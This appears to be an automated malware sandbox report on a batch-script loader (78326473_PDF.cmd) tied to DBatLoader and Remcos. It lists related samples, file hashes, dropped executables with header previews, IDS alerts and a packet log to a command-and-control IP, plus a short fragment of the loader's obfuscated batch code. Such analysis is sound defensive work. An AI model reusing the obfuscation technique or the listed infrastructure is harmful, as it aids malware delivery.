                              GestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                241481565-044416-sanlccjavap0003-6624_PDF.TXT.PNG.MPEG.CMD.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                  Julcbozqsvtzlo.cmdGet hashmaliciousRemcos, AveMaria, DBatLoader, PrivateLoader, UACMeBrowse
                                    Uduknnywyznljn.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                      IN-34823_PO39276-pdf.vbeGet hashmaliciousRemcos, DBatLoaderBrowse
                                        Products_Specification.XLs.PIF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                          PAYMENT SWIFT.XLs.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            taksonsdfg.co.in6BE4RDldhw.exeGet hashmaliciousDBatLoaderBrowse
                                            • 108.170.55.202
                                            FACTURA.cmdGet hashmaliciousDBatLoaderBrowse
                                            • 108.170.55.202
                                            GestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                            • 108.170.55.202
                                            241481565-044416-sanlccjavap0003-6624_PDF.TXT.PNG.MPEG.CMD.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                            • 108.170.55.202
                                            Julcbozqsvtzlo.cmdGet hashmaliciousRemcos, AveMaria, DBatLoader, PrivateLoader, UACMeBrowse
                                            • 108.170.55.202
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            SSASN2US6BE4RDldhw.exeGet hashmaliciousDBatLoaderBrowse
                                            • 108.170.55.202
                                            arm.elfGet hashmaliciousMirai, MoobotBrowse
                                            • 198.15.97.148
                                            https://Saic.anastaclooverseas.com/zwfgemvfcbcitui/xivyvjldaquzs/Zgktmgjdfgpirwe89g0xmaersk/ixiswwcbzmfgee/jebqtppyunp/andrew.ma/inpoxqhfiww/saic.com/ozwunijponqp8Get hashmaliciousHTMLPhisherBrowse
                                            • 108.170.55.202
                                            5.htaGet hashmaliciousUnknownBrowse
                                            • 131.153.13.235
                                            nabmips.elfGet hashmaliciousUnknownBrowse
                                            • 64.38.201.185
                                            la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                            • 108.170.53.110
                                            bin.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 198.15.73.56
                                            FACTURA.cmdGet hashmaliciousDBatLoaderBrowse
                                            • 108.170.55.202
                                            AGjaVihni8.elfGet hashmaliciousMirai, GafgytBrowse
                                            • 66.85.144.18
                                            GestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                            • 108.170.55.202
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            a0e9f5d64349fb13191bc781f81f42e1Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 108.170.55.202
                                            FHG538JGH835DG86S.docGet hashmaliciousUnknownBrowse
                                            • 108.170.55.202
                                            RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 108.170.55.202
                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                            • 108.170.55.202
                                            file.exeGet hashmaliciousUnknownBrowse
                                            • 108.170.55.202
                                            EPTMAcgvNZ.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                            • 108.170.55.202
                                            AWkpqJMxci.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • 108.170.55.202
                                            D2pQ4J4GGZ.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • 108.170.55.202
                                            C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                            • 108.170.55.202
                                            2jbMIxCFsK.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                            • 108.170.55.202
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Users\Public\alpha.exeiuhmzvlH.cmdGet hashmaliciousUnknownBrowse
                                              USD470900_COPY_800BLHSBC882001.PDF.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                  Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                    #U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmdGet hashmaliciousUnknownBrowse
                                                      #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                                        TZH3Uk8x45.batGet hashmaliciousDBatLoader, PureLog Stealer, XWormBrowse
                                                          Payment.cmdGet hashmaliciousAzorult, DBatLoaderBrowse
                                                            FACTURA.cmdGet hashmaliciousDBatLoaderBrowse
                                                              rPO767575.cmdGet hashmaliciousDBatLoaderBrowse
                                                                Process:C:\Users\Public\kn.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):4970080
                                                                Entropy (8bit):3.7662406331652907
                                                                Encrypted:false
                                                                SSDEEP:24576:goGEeGJdhZCVJG00WQQkgfxRta+KKDe08GjcR:/
                                                                MD5:9DCDD6E703F63872450A29843CC225D8
                                                                SHA1:DEADA0C9B2A7059B01958F0CBD173A77182BD03A
                                                                SHA-256:A36432DC3DFE90959DC37FC8124BD6D292391569E071C2B3BE67A53531A2AACE
                                                                SHA-512:E53354A5F917ABC8C36F43E79DDEC53E2B8D6EE8F1A38B7C5F777751C8F34EB8E53F03C633B20FCA6993031B78BAB5D454FAACCDF8BCB5782C77876D8F08AD50
                                                                Malicious:false
                                                                Preview:0000.4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00..0010.b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00..0020.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..0030.00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00..0040.ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90..0050.54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73..0060.74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57..0070.69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00..0080.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..0090.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..00a0.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..00b0.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..00c0.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..00d0.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..00e0.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..00f0.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..0100.50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00..0110.00 00 00 00 e0 00 8e 81 0b 01 02 19 00 ca 05 00..0120.00 c8
                                                                Process:C:\Users\Public\kn.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1414656
                                                                Entropy (8bit):7.267732796117887
                                                                Encrypted:false
                                                                SSDEEP:24576:NoSnw6tsYL4kfl8hNlVkEUsprrwr6HSJAXv0E65vYZv/UdW3seBdZJ5:1jsHkEU8rsr6HSJSME6VXWzBN5
                                                                MD5:7614CE01178ED3B6E66ECCBB0300FCF8
                                                                SHA1:3774CF5B5A3060F1A02946DE4C192778D4256852
                                                                SHA-256:F2ACF58A7B9BB7E4621A7187A6DB9F294A3EE0106C3A00D8CF6D55107DD19AE1
                                                                SHA-512:E20E8CCAA3E16E1D573EB741FC4E7D27DE128D83DD9A504516C5FBEA23538B3ED5D02466898AF3762EE2837F9B4839454045A3FF6FA1FD0CB464DA0377E886A4
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 68%
                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................@...................@...........................`...$... ..........................df...................................................f...............................text...p........................... ..`.itext.............................. ..`.data....$.......&..................@....bss.....6... ...........................idata...$...`...&..................@....tls....4................................rdata..............................@..@.reloc..df.......h..................@..B.rsrc........ ......................@..@.............@......................@..@................................................................................................
                                                                Process:C:\Windows\System32\extrac32.exe
                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                Category:modified
                                                                Size (bytes):289792
                                                                Entropy (8bit):6.135598950357573
                                                                Encrypted:false
                                                                SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
                                                                MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
                                                                SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
                                                                SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: iuhmzvlH.cmd, Detection: malicious, Browse
                                                                • Filename: USD470900_COPY_800BLHSBC882001.PDF.bat, Detection: malicious, Browse
                                                                • Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse
                                                                • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                                                • Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmd, Detection: malicious, Browse
                                                                • Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmd, Detection: malicious, Browse
                                                                • Filename: TZH3Uk8x45.bat, Detection: malicious, Browse
                                                                • Filename: Payment.cmd, Detection: malicious, Browse
                                                                • Filename: FACTURA.cmd, Detection: malicious, Browse
                                                                • Filename: rPO767575.cmd, Detection: malicious, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\extrac32.exe
                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                Category:modified
                                                                Size (bytes):1651712
                                                                Entropy (8bit):6.144018815244304
                                                                Encrypted:false
                                                                SSDEEP:24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
                                                                MD5:F17616EC0522FC5633151F7CAA278CAA
                                                                SHA1:79890525360928A674D6AEF11F4EDE31143EEC0D
                                                                SHA-256:D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
                                                                SHA-512:3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u}{h1..;1..;1..;..;0..;%w.:2..;%w.:*..;%w.:!..;%w.:...;1..;...;%w.:...;%w.;0..;%w.:0..;Rich1..;................PE..d...+. H.........."..................L.........@....................................q.....`.......... ......................................@Q.......`..@........x..............l'..p5..T...........................`(..............x)......XC.......................text............................... ..`.rdata..T...........................@..@.data....&..........................@....pdata...x.......z...|..............@..@.didat.......P......................@....rsrc...@....`......................@..@.reloc..l'.......(..................@..B........................................................................................................................................................................................................................
                                                                Process:C:\Users\Public\alpha.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):104
                                                                Entropy (8bit):4.403504238247217
                                                                Encrypted:false
                                                                SSDEEP:3:HnRthLK5aTRECUAdROGCOwXWnjTRrGIAOFZRMQcv:HRoAREYTOGjHVF+
                                                                MD5:E14D0D771A7FEB9D78EA3DCA9197BA2A
                                                                SHA1:48E363AAD601D9073D803AA9D224BF9A7FC39119
                                                                SHA-256:0C13A861207709C246F13ACE164529F31F2F91CF14BD37795192D5B37E965BE6
                                                                SHA-512:3460F93FEA31D68E49B1B82EDCB8A2A9FCCE34910DD04DEE7BD7503DB8DAB6D1D5C73CBD2C15156DCB601512AD68DE6FEF7DCB8F8A72A8A0747248B378C17CF9
                                                                Malicious:false
                                                                Preview:The system cannot find message text for message number 0x400023a1 in the message file for Application...
                                                                File type:ISO-8859 text, with very long lines (956), with CRLF line terminators
                                                                Entropy (8bit):5.0998241591161575
                                                                TrID:
                                                                  File name:78326473_PDF.cmd
                                                                  File size:7'182'316 bytes
                                                                  MD5:2152288a44df543c12a71a50df1ed7b6
                                                                  SHA1:3d9f4c31f2366d2e75b5d6de5eb790da8bf07f1e
                                                                  SHA256:08eff0bb7bf2a683834cba1a3602e59ab3e803ce18e2998bd944ad06ec0e2736
                                                                  SHA512:32558f9fb65ca2adbbd572024f79fee514241b3b5bc35a09e62d0f622955da0f64ab7dd1697621cfa6492095711113408c0b5b619d3beb9fa960746b3ec07b6a
                                                                  SSDEEP:49152:NL4RD6gKgoYnqvkzd7uTu1DfSYr6EuG+1y3OgKVUGVpxRTw:Y
                                                                  TLSH:0D76A707E48F90E3670C53EF234F54448CA6E5B619AE7E50BBC6363C1E6298EFE45198
                                                                  File Content Preview:COMCOM..&@cls&@set "_...=DJcBebTEQGtSYd3yMnqU6HKs x1C5NmRI@9lwgZfrpVPahWz4F0X8oL2OkjiAuv7"..%_...:~33,1%%_...:~23,1%%_...:~4,1%%_...:~10,1%%_...:~24,1%"_...=%_...:~33,1%%_...:~53,1%%_...:~55,1%%_...:~16,1%%_...:~19,1%%_...:~35,1%%_...:~15,1%%_...:~3,1%%_.
                                                                  Icon Hash:9686878b929a9886
                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-11-26T09:38:13.488731+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749703108.170.55.202443TCP
                                                                  2024-11-26T09:38:15.373825+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749709108.170.55.202443TCP
                                                                  2024-11-26T09:38:17.658989+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749716108.170.55.202443TCP
                                                                  2024-11-26T09:38:19.684214+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749722108.170.55.202443TCP
                                                                  2024-11-26T09:38:22.202203+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749730108.170.55.202443TCP
                                                                  2024-11-26T09:38:24.042666+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749737108.170.55.202443TCP
                                                                  2024-11-26T09:38:26.793550+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749746108.170.55.202443TCP
                                                                  2024-11-26T09:38:28.718305+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749752108.170.55.202443TCP
                                                                  2024-11-26T09:38:31.131811+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749759108.170.55.202443TCP
                                                                  2024-11-26T09:38:33.055290+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749765108.170.55.202443TCP
                                                                  2024-11-26T09:38:35.392041+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749772108.170.55.202443TCP
                                                                  2024-11-26T09:38:37.301990+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749776108.170.55.202443TCP
                                                                  2024-11-26T09:38:39.542893+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749783108.170.55.202443TCP
                                                                  2024-11-26T09:38:41.373681+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749787108.170.55.202443TCP
                                                                  2024-11-26T09:38:43.663701+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749794108.170.55.202443TCP
                                                                  2024-11-26T09:38:45.769416+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749799108.170.55.202443TCP
                                                                  2024-11-26T09:38:48.052720+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749806108.170.55.202443TCP
                                                                  2024-11-26T09:38:49.949514+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749812108.170.55.202443TCP
                                                                  2024-11-26T09:38:52.289192+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749819108.170.55.202443TCP
                                                                  2024-11-26T09:38:54.212645+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749825108.170.55.202443TCP
                                                                  2024-11-26T09:38:56.622773+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749832108.170.55.202443TCP
                                                                  2024-11-26T09:38:58.920053+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749838108.170.55.202443TCP
                                                                  2024-11-26T09:39:01.454782+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749845108.170.55.202443TCP
                                                                  2024-11-26T09:39:03.329019+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749851108.170.55.202443TCP
                                                                  2024-11-26T09:39:05.597669+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749858108.170.55.202443TCP
                                                                  2024-11-26T09:39:07.526693+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749866108.170.55.202443TCP
                                                                  2024-11-26T09:39:09.878954+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749874108.170.55.202443TCP
                                                                  2024-11-26T09:39:11.922607+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749879108.170.55.202443TCP
                                                                  2024-11-26T09:39:14.318187+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749886108.170.55.202443TCP
                                                                  2024-11-26T09:39:16.447525+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749890108.170.55.202443TCP
                                                                  2024-11-26T09:39:18.880685+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749899108.170.55.202443TCP
                                                                  2024-11-26T09:39:20.770117+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749903108.170.55.202443TCP
                                                                  2024-11-26T09:39:23.216540+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749910108.170.55.202443TCP
                                                                  2024-11-26T09:39:25.038371+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749916108.170.55.202443TCP
                                                                  2024-11-26T09:39:27.364917+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749923108.170.55.202443TCP
                                                                  2024-11-26T09:39:29.278485+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749928108.170.55.202443TCP
                                                                  2024-11-26T09:39:31.812672+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749936108.170.55.202443TCP
                                                                  2024-11-26T09:39:33.729744+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749941108.170.55.202443TCP
                                                                  2024-11-26T09:39:35.982733+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749948108.170.55.202443TCP
                                                                  2024-11-26T09:39:37.956949+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749952108.170.55.202443TCP
                                                                  2024-11-26T09:39:40.240537+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749959108.170.55.202443TCP
                                                                  2024-11-26T09:39:42.172799+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749965108.170.55.202443TCP
                                                                  2024-11-26T09:39:44.466544+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749972108.170.55.202443TCP
                                                                  2024-11-26T09:39:46.407698+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749978108.170.55.202443TCP
                                                                  2024-11-26T09:39:48.739992+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749985108.170.55.202443TCP
                                                                  2024-11-26T09:39:50.961356+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749991108.170.55.202443TCP
                                                                  2024-11-26T09:39:53.255157+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749998108.170.55.202443TCP
                                                                  2024-11-26T09:39:55.081655+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750004108.170.55.202443TCP
                                                                  2024-11-26T09:39:57.361369+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750011108.170.55.202443TCP
                                                                  2024-11-26T09:39:59.231464+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750015108.170.55.202443TCP
                                                                  2024-11-26T09:40:01.568741+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750021108.170.55.202443TCP
                                                                  2024-11-26T09:40:03.414641+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750025108.170.55.202443TCP
                                                                  2024-11-26T09:40:06.069106+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750032108.170.55.202443TCP
                                                                  2024-11-26T09:40:08.003114+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750037108.170.55.202443TCP
                                                                  2024-11-26T09:40:10.645305+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750044108.170.55.202443TCP
                                                                  2024-11-26T09:40:12.532491+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750049108.170.55.202443TCP
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 26, 2024 09:38:11.959844112 CET49702443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:11.959876060 CET44349702108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:11.959959984 CET49702443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:11.984653950 CET49702443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:11.984708071 CET44349702108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:11.987838030 CET49702443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:12.047992945 CET49703443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:12.048021078 CET44349703108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:12.048083067 CET49703443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:12.060780048 CET49703443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:12.060801983 CET44349703108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:13.488643885 CET44349703108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:13.488730907 CET49703443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:13.491528988 CET49703443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:13.491539001 CET44349703108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:13.491921902 CET44349703108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:13.535357952 CET49703443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:13.583334923 CET44349703108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:13.992522955 CET44349703108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:13.992710114 CET44349703108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:13.992850065 CET49703443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:13.998425007 CET49703443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:13.998450041 CET44349703108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:13.998461008 CET49703443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:13.998466969 CET44349703108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:14.000108004 CET49709443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:14.000163078 CET44349709108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:14.000240088 CET49709443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:14.000454903 CET49709443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:14.000473022 CET44349709108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:15.373070955 CET44349709108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:15.373825073 CET49709443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:15.373838902 CET44349709108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:15.375408888 CET49709443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:15.375415087 CET44349709108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:15.999136925 CET44349709108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:16.008905888 CET44349709108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:16.009005070 CET49709443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:16.009043932 CET44349709108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:16.010545015 CET44349709108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:16.010597944 CET49709443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:16.010674000 CET49709443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:16.010693073 CET44349709108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:16.010708094 CET49709443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:16.010713100 CET44349709108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:16.243105888 CET49715443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:16.243164062 CET44349715108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:16.243263006 CET49715443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:16.247030020 CET49715443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:16.247107029 CET44349715108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:16.247520924 CET49715443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:16.280000925 CET49716443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:16.280036926 CET44349716108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:16.280215979 CET49716443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:16.280469894 CET49716443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:16.280486107 CET44349716108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:17.658904076 CET44349716108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:17.658988953 CET49716443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:17.660182953 CET49716443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:17.660196066 CET44349716108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:17.660445929 CET44349716108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:17.661740065 CET49716443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:17.707344055 CET44349716108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:18.161483049 CET44349716108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:18.161931038 CET44349716108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:18.162019014 CET49716443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:18.162076950 CET49716443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:18.162100077 CET44349716108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:18.162112951 CET49716443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:18.162117958 CET44349716108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:18.162938118 CET49722443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:18.162993908 CET44349722108.170.55.202192.168.2.7
                                                                  Nov 26, 2024 09:38:18.163074017 CET49722443192.168.2.7108.170.55.202
                                                                  Nov 26, 2024 09:38:18.163290024 CET49722443192.168.2.7108.170.55.202
